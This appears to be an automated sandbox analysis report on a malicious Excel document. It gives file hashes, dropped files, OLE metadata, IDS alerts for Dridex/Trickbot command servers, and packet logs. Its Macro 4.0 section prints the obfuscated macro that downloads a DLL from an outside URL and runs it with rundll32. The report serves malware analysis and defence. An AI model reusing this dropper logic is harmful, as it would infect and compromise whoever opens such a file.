                                                                                                                                            • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: Sign-636.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: Sign-92793351_1597657581.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: Sign-979329054_1327186231.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: Sign-709986424_219667767.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: Sign-488964532_2104982999.xls, Detection: malicious, Browse
                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                            IE Cache URL:http://www.chipmania.it/mails/open.php
                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\Users\user\AppData\Local\Temp\0BCE0000
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):155530
                                                                                                                                            Entropy (8bit):7.660505379704475
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXF:YEGSzx0dmxk7RbsYsKtseoX1
                                                                                                                                            MD5:3CFBC6707341EF2AF668B0B66554A0D8
                                                                                                                                            SHA1:2E47F97B737C1885E37322D4789B67BC79D0625F
                                                                                                                                            SHA-256:BE269837B25164FC761785BE33AEB7A7ADAC5138AB3C081BA678F310A6674FEA
                                                                                                                                            SHA-512:1BE89DB6402BB1F07AA271C8E58AE75BB2AEAF20200EBCF118484AC8F7D5E9DF96D0C3B6A1AEE88F6197E85287D54645CE67D01B8835D8E737657521F0D6F954
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: ...n.0.E.......D'.....E....I?.&..k..a...;...5.K....{..H......"j.Zv..X.Nz.]..._..$...;h....,..?l.`E..[..>q...+......|.".m.x.r-:......K.R...[..J<.T.n....R;V}..Q-.!.-E"...#H.W+-Ay.hI...A(...5M.....R......#...tY8....Q..}%..,.`....r..*..^.}.wja...;..7a.^|c.......H....6.LSj.X!..ubi..v/..J$.r.....39...I...Q|O5r..w.T...|.c..O........0m...\..n':D.E.u..O....?..|.(........{...1...&.........1}.}@.."L.....]....4....u .t..<.\ .S...6/...........PK..........!..#|.....X.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Feb 20 09:16:38 2021, atime=Sat Feb 20 09:16:38 2021, length=8192, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):867
                                                                                                                                            Entropy (8bit):4.471936882845852
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:85QfAVNcLgXg/XAlCPCHaXgzB8IB/8PHxX+WnicvbTfbDtZ3YilMMEpxRljKw6Tg:85bNK/XTwz6IGxYeHDDv3q+rNru/
                                                                                                                                            MD5:8095CD6291864E260C361BF1A10EA172
                                                                                                                                            SHA1:752607AC2889B2E58D3EB31D7947D618A2A37059
                                                                                                                                            SHA-256:1F3839B20BF958449313BD88CD52DB6CA36AFD3400648086ACF7BB7288B5BCCF
                                                                                                                                            SHA-512:4A8F9A3FCDEB7971FF3E2DFEF08F72611E5EF85FCC09D8EB8C8F142BD7DAD142FA28F46FA586CECCB02B7772C6DD3919BA03337800A54604CA773A56D69CA6B0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: L..................F...........7G..._jyq...._jyq.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TR.R..Desktop.d......QK.XTR.R*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\377142\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......377142..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Siggen3.10350.12632.LNK
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Feb 20 09:16:25 2021, mtime=Sat Feb 20 09:16:38 2021, atime=Sat Feb 20 09:16:38 2021, length=168448, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2368
                                                                                                                                            Entropy (8bit):4.571681128279049
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:8W/XT3IHvjHCEsfHC4+Qh2W/XT3IHvjHCEsfHC4+Q/:8W/XLILiW4+Qh2W/XLILiW4+Q/
                                                                                                                                            MD5:219D84A5D4271A1B5652936B567E0447
                                                                                                                                            SHA1:F7BFF2FDA0916098A953AA4ECE644FAD43285EC7
                                                                                                                                            SHA-256:2BA7892A29E9B37D1FB472361CC3276B8FFD38D38C54B974012B2D3301FD714C
                                                                                                                                            SHA-512:E796B5EABBC8E454C63A8BBB9FC8DBE5BD42B7E5C698238B5BD77EA2538050A10CED8415D13E5EC7B94A9A539BE6B62A7DD14706A909EF611EF8F897D2BD7354
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: L..................F.... ......qq...._jyq.....qyq................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TR.R..Desktop.d......QK.XTR.R*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....TR.R .SECURI~1.XLS.........TR.RTR.R*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...1.2.6.3.2...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\377142\Users.user\Desktop\SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls.G.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...1.2.6.3.2...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):185
                                                                                                                                            Entropy (8bit):4.876408116811588
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:oyBVomM0bcsoMW4CuscbcsoMW4CmM0bcsoMW4Cv:dj60wsoMWOwsoMWR0wsoMWV
                                                                                                                                            MD5:0705594BE5F4187688CFE5334909ABDC
                                                                                                                                            SHA1:321F5868568FDED9259F861BA40960D027D6A794
                                                                                                                                            SHA-256:BF282C362016DCFDBABDBE3DB34A3394434CE9EF8FFF9A7E0B3F6AAC1071BD6D
                                                                                                                                            SHA-512:4788B12278CAF8CE9C9782BE378B3464EDE8D0546D14DFC0965540C1E11EA692A468D7816FD0A72C10C11ABBAC473701E05E56CA4FCB4D8B7A61A21FA1F475B7
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.12632.LNK=0..SecuriteInfo.com.Exploit.Siggen3.10350.12632.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.12632.LNK=0..
                                                                                                                                            C:\Users\user\BASE.BABAA
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4591104
                                                                                                                                            Entropy (8bit):5.0540147937501265
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                            MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                            SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                            SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                            SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: Sign-636.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: Sign-92793351_1597657581.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: Sign-979329054_1327186231.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: Sign-709986424_219667767.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: Sign-488964532_2104982999.xls, Detection: malicious, Browse
                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\Users\user\Desktop\3ECE0000
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):177025
                                                                                                                                            Entropy (8bit):7.239939848374362
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2Qnr:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKf
                                                                                                                                            MD5:8C6E6E3B60E506C0CCA7F66BBB581A1A
                                                                                                                                            SHA1:04F6ABD1996A42A02763B9F32DA952A7FDEDE7A0
                                                                                                                                            SHA-256:CF2F697E24C0B014B1513632471C307F9DCF141C34C44D5DF54297695457DD74
                                                                                                                                            SHA-512:1BA5A33D57C5D082422E6431B7F53B57C971F2B97EE7C95C3B1D902E7F2B4B0F9D380EEC7F0CD56FAB6083A98710A0FF3B0657217B75748C6CF776277212F7C1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: ........g2.........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 10:48:36 2021, Security: 0
                                                                                                                                            Entropy (8bit):7.195176543915214
                                                                                                                                            TrID:
                                                                                                                                            • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                            File name:SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls
                                                                                                                                            File size:168960
                                                                                                                                            MD5:422030b616989ef7bf2f56a2f266068f
                                                                                                                                            SHA1:04ec47e9f08ed7e4861c6f252a381faee4283bf9
                                                                                                                                            SHA256:6f1c23f3d7e471cf0c4a91f59c94853128413b84065ef42ad2065337b973beab
                                                                                                                                            SHA512:bd90c0d5f31bc58456d179d753cfb1838a23312f2b0ea2aa01c9ed6223d9c72ee25929f60b6a85a65e800997b9fe745392379b4eb96a51bf94b2f903b41b2ec1
                                                                                                                                            SSDEEP:3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMn:OcKoSsxzNDZLDZjlbR868O8KlVH3jiKi
                                                                                                                                            File Content Preview:........................>.......................H...........................E...F...G..........................................................................................................................................................................

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:e4eea286a4b4bcb4

                                                                                                                                            Static OLE Info

                                                                                                                                            General

                                                                                                                                            Document Type:OLE
                                                                                                                                            Number of OLE Files:1

                                                                                                                                            OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls"

                                                                                                                                            Indicators

                                                                                                                                            Has Summary Info:True
                                                                                                                                            Application Name:Microsoft Excel
                                                                                                                                            Encrypted Document:False
                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                            Contains Workbook/Book Stream:True
                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                            Flash Objects Count:
                                                                                                                                            Contains VBA Macros:True

                                                                                                                                            Summary

                                                                                                                                            Code Page:1251
                                                                                                                                            Author:
                                                                                                                                            Last Saved By:
                                                                                                                                            Create Time:2006-09-16 00:00:00
                                                                                                                                            Last Saved Time:2021-02-19 10:48:36
                                                                                                                                            Creating Application:Microsoft Excel
                                                                                                                                            Security:0

                                                                                                                                            Document Summary

                                                                                                                                            Document Code Page:1251
                                                                                                                                            Thumbnail Scaling Desired:False
                                                                                                                                            Contains Dirty Links:False
                                                                                                                                            Shared Document:False
                                                                                                                                            Changed Hyperlinks:False
                                                                                                                                            Application Version:917504

                                                                                                                                            Streams

                                                                                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                            General
                                                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:4096
                                                                                                                                            Entropy:0.357299206868
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                            General
                                                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:4096
                                                                                                                                            Entropy:0.247217286775
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800
                                                                                                                                            General
                                                                                                                                            Stream Path:Workbook
                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                            Stream Size:157800
                                                                                                                                            Entropy:7.46869820242
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                                            Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                            Macro 4.0 Code

                                                                                                                                            ,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
                                                                                                                                            "=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,

                                                                                                                                            Network Behavior

                                                                                                                                            Snort IDS Alerts

                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                            02/20/21-02:16:54.765622TCP2404324ET CNC Feodo Tracker Reported CnC Server TCP group 1349166443192.168.2.22200.52.147.93
                                                                                                                                            02/20/21-02:18:53.303160TCP2404306ET CNC Feodo Tracker Reported CnC Server TCP group 449167443192.168.2.22142.202.191.164
                                                                                                                                            02/20/21-02:18:55.128222TCP2404320ET CNC Feodo Tracker Reported CnC Server TCP group 1149169443192.168.2.22193.8.194.96
                                                                                                                                            02/20/21-02:18:55.532096TCP2021013ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)44349169193.8.194.96192.168.2.22

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Feb 20, 2021 02:16:43.694610119 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.752089024 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.752243042 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.753083944 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.813005924 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.822292089 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.822345972 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.822381973 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.822411060 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.822443008 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.822474003 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.822495937 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.822505951 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.822525024 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.822530031 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.822535038 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.822539091 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.822539091 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.822565079 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.822571993 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.822609901 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.822611094 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.822644949 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.822664022 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.827573061 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.882463932 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882489920 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882503033 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882517099 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882530928 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882544041 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882561922 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882590055 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882601976 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882616043 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882627964 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882638931 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882646084 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.882649899 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882668018 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882685900 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882702112 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882700920 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.882749081 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.882765055 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882783890 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882792950 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.882796049 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.882810116 CET8049165185.81.0.78192.168.2.22
